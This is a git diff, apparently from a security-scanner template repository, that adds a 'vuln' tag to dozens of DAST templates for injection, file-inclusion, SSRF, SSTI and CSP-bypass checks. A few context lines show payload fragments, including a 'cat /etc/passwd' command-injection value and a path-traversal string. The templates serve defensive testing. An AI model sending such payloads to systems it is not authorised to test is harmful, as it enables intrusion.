+20,7 @@ info: cwe-id: CWE-787 epss-score: 0.92648 epss-percentile: 0.99735 - tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast,vkev + tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast,vkev,vuln flow: http(1) && http(2) diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml index 1b61220d714..8e1467fc58e 100644 --- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -12,7 +12,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md metadata: max-request: 4 - tags: cmdi,oast,dast,blind,polyglot + tags: cmdi,oast,dast,blind,polyglot,vuln variables: marker: "{{interactsh-url}}" diff --git a/dast/vulnerabilities/cmdi/python-code-injection.yaml b/dast/vulnerabilities/cmdi/python-code-injection.yaml index 94303075599..825e0ca97c2 100644 --- a/dast/vulnerabilities/cmdi/python-code-injection.yaml +++ b/dast/vulnerabilities/cmdi/python-code-injection.yaml @@ -4,7 +4,7 @@ info: name: Python Code Injection author: ritikchaddha severity: high - tags: python,dast,injection,cmdi + tags: python,dast,injection,cmdi,vuln variables: Command: "cat /etc/passwd" diff --git a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml index c3b76bbc559..310db3015ea 100644 --- a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml +++ b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml @@ -11,7 +11,7 @@ info: - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ metadata: max-request: 1 - tags: cmdi,oast,dast,blind,ruby,rce + tags: cmdi,oast,dast,blind,ruby,rce,vuln variables: marker: "{{interactsh-url}}" diff --git a/dast/vulnerabilities/crlf/cookie-injection.yaml b/dast/vulnerabilities/crlf/cookie-injection.yaml index 50990f26d7f..8f443297d43 100644 --- a/dast/vulnerabilities/crlf/cookie-injection.yaml +++ b/dast/vulnerabilities/crlf/cookie-injection.yaml @@ -9,7 +9,7 @@ info: - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm metadata: max-request: 1 - tags: reflected,dast,cookie,injection + tags: reflected,dast,cookie,injection,vuln variables: first: "cookie_injection" diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml index 1dc6ca944fc..f4dc469547c 100644 --- a/dast/vulnerabilities/crlf/crlf-injection.yaml +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -6,7 +6,7 @@ info: severity: low metadata: max-request: 41 - tags: crlf,dast + tags: crlf,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml index 0b2e0124a67..3a0d4849f1e 100644 --- a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml +++ b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml @@ -13,7 +13,7 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs - tags: angular,csti,dast,headless,xss + tags: angular,csti,dast,headless,xss,vuln variables: first: "{{rand_int(1000, 9999)}}" diff --git a/dast/vulnerabilities/injection/csv-injection.yaml b/dast/vulnerabilities/injection/csv-injection.yaml index a1bb9c87fd8..4a941c60e1d 100644 --- a/dast/vulnerabilities/injection/csv-injection.yaml +++ b/dast/vulnerabilities/injection/csv-injection.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications. - tags: dast,csv,oast + tags: dast,csv,oast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/injection/xinclude-injection.yaml b/dast/vulnerabilities/injection/xinclude-injection.yaml index 9b01f0e0f24..d936baff6a4 100644 --- a/dast/vulnerabilities/injection/xinclude-injection.yaml +++ b/dast/vulnerabilities/injection/xinclude-injection.yaml @@ -8,7 +8,7 @@ info: XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. reference: - https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks - tags: dast,xxe,xinclude + tags: dast,xxe,xinclude,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml index ddbd4fec84f..e3d73ace15e 100644 --- a/dast/vulnerabilities/lfi/lfi-keyed.yaml +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -8,7 +8,7 @@ info: - https://owasp.org/www-community/attacks/Unicode_Encoding metadata: max-request: 25 - tags: dast,pathtraversal,lfi + tags: dast,pathtraversal,lfi,vuln variables: fuzz: "../../../../../../../../../../../../../../../" diff --git a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml index 774489d2d69..6d379cb16a1 100644 --- a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion metadata: max-request: 46 - tags: lfi,dast,linux + tags: lfi,dast,linux,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml index 25949c92152..6e34e0a7b48 100644 --- a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: high metadata: max-request: 39 - tags: lfi,windows,dast + tags: lfi,windows,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/redirect/open-redirect-bypass.yaml b/dast/vulnerabilities/redirect/open-redirect-bypass.yaml index 844cbe091fd..7f39c932ab6 100644 --- a/dast/vulnerabilities/redirect/open-redirect-bypass.yaml +++ b/dast/vulnerabilities/redirect/open-redirect-bypass.yaml @@ -6,7 +6,7 @@ info: severity: medium metadata: max-request: 1 - tags: redirect,dast + tags: redirect,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 76b00e475be..be0c2a0ec32 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -6,7 +6,7 @@ info: severity: medium metadata: max-request: 1 - tags: redirect,dast + tags: redirect,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/rfi/generic-rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml index ebd9c91db40..de28946e2e1 100644 --- a/dast/vulnerabilities/rfi/generic-rfi.yaml +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -8,7 +8,7 @@ info: - https://www.invicti.com/learn/remote-file-inclusion-rfi/ metadata: max-request: 1 - tags: rfi,dast,oast + tags: rfi,dast,oast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/sqli/sqli-error-based.yaml b/dast/vulnerabilities/sqli/sqli-error-based.yaml index bab2a82e18e..01a0fce8772 100644 --- a/dast/vulnerabilities/sqli/sqli-error-based.yaml +++ b/dast/vulnerabilities/sqli/sqli-error-based.yaml @@ -10,7 +10,7 @@ info: This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . metadata: max-request: 3 - tags: sqli,error,dast + tags: sqli,error,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index e44f11eacee..a14030f4b65 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | Sends time-delay SQL payloads and measures response latency to confirm blind injection in various database engines, enabling data extraction without direct error messages. - tags: time-based-sqli,sqli,dast,blind + tags: time-based-sqli,sqli,dast,blind,vuln flow: http(1) && http(2) diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index 03a4cf1479f..a4cbcbc0fda 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: medium metadata: max-request: 3 - tags: ssrf,dast,oast + tags: ssrf,dast,oast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml index 9fed98e2600..2fab62af0a6 100644 --- a/dast/vulnerabilities/ssrf/response-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -8,7 +8,7 @@ info: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py metadata: max-request: 12 - tags: ssrf,dast + tags: ssrf,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/freemarker-sandbox-bypass-ssti.yaml b/dast/vulnerabilities/ssti/freemarker-sandbox-bypass-ssti.yaml index 26953e110ca..21fa0d4c6dd 100644 --- a/dast/vulnerabilities/ssti/freemarker-sandbox-bypass-ssti.yaml +++ b/dast/vulnerabilities/ssti/freemarker-sandbox-bypass-ssti.yaml @@ -10,7 +10,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#freemarker---sandbox-bypass metadata: verified: true - tags: ssti,dast,freemarker + tags: ssti,dast,freemarker,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/blade-oob.yaml b/dast/vulnerabilities/ssti/oob/blade-oob.yaml index 34289a10557..bfe814fddf8 100644 --- a/dast/vulnerabilities/ssti/oob/blade-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/blade-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/bottle-oob.yaml b/dast/vulnerabilities/ssti/oob/bottle-oob.yaml index ae223c9e229..d2fa2fba4a1 100644 --- a/dast/vulnerabilities/ssti/oob/bottle-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/bottle-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln variables: oast: "{{interactsh-url}}" diff --git a/dast/vulnerabilities/ssti/oob/chameleon-oob.yaml b/dast/vulnerabilities/ssti/oob/chameleon-oob.yaml index 49ebd2ad93c..ff6762b20ea 100644 --- a/dast/vulnerabilities/ssti/oob/chameleon-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/chameleon-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/codepen-oob.yaml b/dast/vulnerabilities/ssti/oob/codepen-oob.yaml index 00b6e23faad..dd89feb3faf 100644 --- a/dast/vulnerabilities/ssti/oob/codepen-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/codepen-oob.yaml @@ -8,7 +8,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#codepen metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/dotjs-oob.yaml b/dast/vulnerabilities/ssti/oob/dotjs-oob.yaml index a9b04182fd7..1212ed84ae6 100644 --- a/dast/vulnerabilities/ssti/oob/dotjs-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/dotjs-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln variables: prefix: "{{rand_text_alpha(5)}}" diff --git a/dast/vulnerabilities/ssti/oob/ejs-underscore-oob.yaml b/dast/vulnerabilities/ssti/oob/ejs-underscore-oob.yaml index fc5cbc042c8..b163fc83a03 100644 --- a/dast/vulnerabilities/ssti/oob/ejs-underscore-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/ejs-underscore-oob.yaml @@ -10,7 +10,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln variables: prefix: "{{rand_text_alpha(5)}}" diff --git a/dast/vulnerabilities/ssti/oob/erb-erubi-erubis-oob.yaml b/dast/vulnerabilities/ssti/oob/erb-erubi-erubis-oob.yaml index 91ab5c3e81d..91f20ae27c8 100644 --- a/dast/vulnerabilities/ssti/oob/erb-erubi-erubis-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/erb-erubi-erubis-oob.yaml @@ -10,7 +10,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/freemarker-oob.yaml b/dast/vulnerabilities/ssti/oob/freemarker-oob.yaml index ed18e477e52..8ebfb0009e7 100644 --- a/dast/vulnerabilities/ssti/oob/freemarker-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/freemarker-oob.yaml @@ -10,7 +10,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#freemarker---code-execution metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/groovy-oob.yaml b/dast/vulnerabilities/ssti/oob/groovy-oob.yaml index cee27cf975e..5f429be75c6 100644 --- a/dast/vulnerabilities/ssti/oob/groovy-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/groovy-oob.yaml @@ -12,7 +12,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#groovy---command-execution metadata: verified: true - tags: ssti,dast,oast,oob,groovy + tags: ssti,dast,oast,oob,groovy,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/jinja2-oob.yaml b/dast/vulnerabilities/ssti/oob/jinja2-oob.yaml index b3525c3eb3d..6e31b0b4f22 100644 --- a/dast/vulnerabilities/ssti/oob/jinja2-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/jinja2-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/jinjava-oob.yaml b/dast/vulnerabilities/ssti/oob/jinjava-oob.yaml index 728e9147eee..48de7a3f828 100644 --- a/dast/vulnerabilities/ssti/oob/jinjava-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/jinjava-oob.yaml @@ -10,7 +10,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#jinjava---command-execution metadata: max-request: 1 - tags: ssti,dast,jinjava + tags: ssti,dast,jinjava,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/latte-oob.yaml b/dast/vulnerabilities/ssti/oob/latte-oob.yaml index 41d18e2bd66..c66792c8a77 100644 --- a/dast/vulnerabilities/ssti/oob/latte-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/latte-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/mako-oob.yaml b/dast/vulnerabilities/ssti/oob/mako-oob.yaml index fb357def2f8..869b23cf75c 100644 --- a/dast/vulnerabilities/ssti/oob/mako-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/mako-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/pebble-oob.yaml b/dast/vulnerabilities/ssti/oob/pebble-oob.yaml index 50d3fdf4b00..4b7629b111f 100644 --- a/dast/vulnerabilities/ssti/oob/pebble-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/pebble-oob.yaml @@ -10,7 +10,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#pebble---code-execution metadata: max-request: 1 - tags: ssti,dast,pebble + tags: ssti,dast,pebble,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/pugjs-oob.yaml b/dast/vulnerabilities/ssti/oob/pugjs-oob.yaml index 0682b6eca51..4fd6c9d9390 100644 --- a/dast/vulnerabilities/ssti/oob/pugjs-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/pugjs-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln variables: prefix: "{{rand_text_alpha(5)}}" diff --git a/dast/vulnerabilities/ssti/oob/spring-expression-oob.yaml b/dast/vulnerabilities/ssti/oob/spring-expression-oob.yaml index 1a2d6c5ce04..2dce0c2c86c 100644 --- a/dast/vulnerabilities/ssti/oob/spring-expression-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/spring-expression-oob.yaml @@ -10,7 +10,7 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#spel---command-execution metadata: max-request: 1 - tags: spel,oob,ssti,oast,dast + tags: spel,oob,ssti,oast,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/thymeleaf-oob.yaml b/dast/vulnerabilities/ssti/oob/thymeleaf-oob.yaml index f50de90a01b..e77d4b8e708 100644 --- a/dast/vulnerabilities/ssti/oob/thymeleaf-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/thymeleaf-oob.yaml @@ -10,7 +10,7 @@ info: - https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ metadata: max-request: 1 - tags: thymeleaf,oob,ssti,oast,dast + tags: thymeleaf,oob,ssti,oast,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/tornado-oob.yaml b/dast/vulnerabilities/ssti/oob/tornado-oob.yaml index f8a3e1113ce..dd3b344e80e 100644 --- a/dast/vulnerabilities/ssti/oob/tornado-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/tornado-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/oob/velocityjs-oob.yaml b/dast/vulnerabilities/ssti/oob/velocityjs-oob.yaml index 2f0dc1bfbb4..9c18f5037d7 100644 --- a/dast/vulnerabilities/ssti/oob/velocityjs-oob.yaml +++ b/dast/vulnerabilities/ssti/oob/velocityjs-oob.yaml @@ -9,7 +9,7 @@ info: - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756 metadata: verified: true - tags: ssti,dast,oast,oob + tags: ssti,dast,oast,oob,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/razor-ssti.yaml b/dast/vulnerabilities/ssti/razor-ssti.yaml index 76da05c6d19..bb7363147ab 100644 --- a/dast/vulnerabilities/ssti/razor-ssti.yaml +++ b/dast/vulnerabilities/ssti/razor-ssti.yaml @@ -10,7 +10,7 @@ info: - https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation metadata: max-request: 1 - tags: razor,ssti,dast + tags: razor,ssti,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/reflection-ssti.yaml b/dast/vulnerabilities/ssti/reflection-ssti.yaml index 1d3e400ca5e..ed688158732 100644 --- a/dast/vulnerabilities/ssti/reflection-ssti.yaml +++ b/dast/vulnerabilities/ssti/reflection-ssti.yaml @@ -9,7 +9,7 @@ info: - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update metadata: max-request: 14 - tags: ssti,dast + tags: ssti,dast,vuln variables: first: "{{rand_int(1000, 9999)}}" diff --git a/dast/vulnerabilities/ssti/smarty-ssti.yaml b/dast/vulnerabilities/ssti/smarty-ssti.yaml index 95d31b10179..1ed86464987 100644 --- a/dast/vulnerabilities/ssti/smarty-ssti.yaml +++ b/dast/vulnerabilities/ssti/smarty-ssti.yaml @@ -10,7 +10,7 @@ info: - https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation metadata: max-request: 1 - tags: smarty,ssti,dast + tags: smarty,ssti,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/ssti/twig-ssti.yaml b/dast/vulnerabilities/ssti/twig-ssti.yaml index a5784851380..d7748f4ddbc 100644 --- a/dast/vulnerabilities/ssti/twig-ssti.yaml +++ b/dast/vulnerabilities/ssti/twig-ssti.yaml @@ -10,7 +10,7 @@ info: - https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation metadata: max-request: 1 - tags: twig,ssti,dast + tags: twig,ssti,dast,vuln http: - pre-condition: diff --git a/dast/vulnerabilities/xss/csp-bypass/adnxs-ib-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/adnxs-ib-csp-bypass.yaml index e33e8d6bb7f..15f026ed16d 100644 --- a/dast/vulnerabilities/xss/csp-bypass/adnxs-ib-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/adnxs-ib-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,adnxs-ib + tags: xss,csp-bypass,adnxs-ib,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/adobe-campaign-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/adobe-campaign-csp-bypass.yaml index f0c7ae69959..d29f43e867f 100644 --- a/dast/vulnerabilities/xss/csp-bypass/adobe-campaign-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/adobe-campaign-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,adobe-campaign + tags: xss,csp-bypass,adobe-campaign,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/adroll-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/adroll-csp-bypass.yaml index d5aa71395ee..dedd295044c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/adroll-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/adroll-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,adroll + tags: xss,csp-bypass,adroll,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/afterpay-help-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/afterpay-help-csp-bypass.yaml index 9590099227d..6634f58aa78 100644 --- a/dast/vulnerabilities/xss/csp-bypass/afterpay-help-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/afterpay-help-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,afterpay-help + tags: xss,csp-bypass,afterpay-help,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/akamai-content-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/akamai-content-csp-bypass.yaml index 08510ba5376..6628a39bcec 100644 --- a/dast/vulnerabilities/xss/csp-bypass/akamai-content-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/akamai-content-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,akamai-content + tags: xss,csp-bypass,akamai-content,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/alibaba-ug-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/alibaba-ug-csp-bypass.yaml index 2d0fbf525d8..b97f4451ae8 100644 --- a/dast/vulnerabilities/xss/csp-bypass/alibaba-ug-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/alibaba-ug-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,alibaba-ug + tags: xss,csp-bypass,alibaba-ug,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/aliexpress-acs-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/aliexpress-acs-csp-bypass.yaml index 38c5b2b966c..93814801255 100644 --- a/dast/vulnerabilities/xss/csp-bypass/aliexpress-acs-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/aliexpress-acs-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,aliexpress-acs + tags: xss,csp-bypass,aliexpress-acs,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/amap-wb-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/amap-wb-csp-bypass.yaml index 220b1148523..7bb99c295c7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/amap-wb-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/amap-wb-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,amap-wb + tags: xss,csp-bypass,amap-wb,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/amazon-aax-eu-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/amazon-aax-eu-csp-bypass.yaml index dc98fe9648f..ba677222dca 100644 --- a/dast/vulnerabilities/xss/csp-bypass/amazon-aax-eu-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/amazon-aax-eu-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,amazon-aax-eu + tags: xss,csp-bypass,amazon-aax-eu,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/amazon-media-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/amazon-media-csp-bypass.yaml index c76aeca5422..3941d22dc32 100644 --- a/dast/vulnerabilities/xss/csp-bypass/amazon-media-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/amazon-media-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,amazon-media + tags: xss,csp-bypass,amazon-media,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/amazon-romania-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/amazon-romania-csp-bypass.yaml index 764fd460e8c..fde286be149 100644 --- a/dast/vulnerabilities/xss/csp-bypass/amazon-romania-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/amazon-romania-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,amazon-romania + tags: xss,csp-bypass,amazon-romania,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/amazon-s3-elysium-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/amazon-s3-elysium-csp-bypass.yaml index 60563ace874..e4d35e82b58 100644 --- a/dast/vulnerabilities/xss/csp-bypass/amazon-s3-elysium-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/amazon-s3-elysium-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,amazon-s3-elysium + tags: xss,csp-bypass,amazon-s3-elysium,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ancestrycdn-angular-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ancestrycdn-angular-csp-bypass.yaml index 1922ef4a319..08eef1eb160 100644 --- 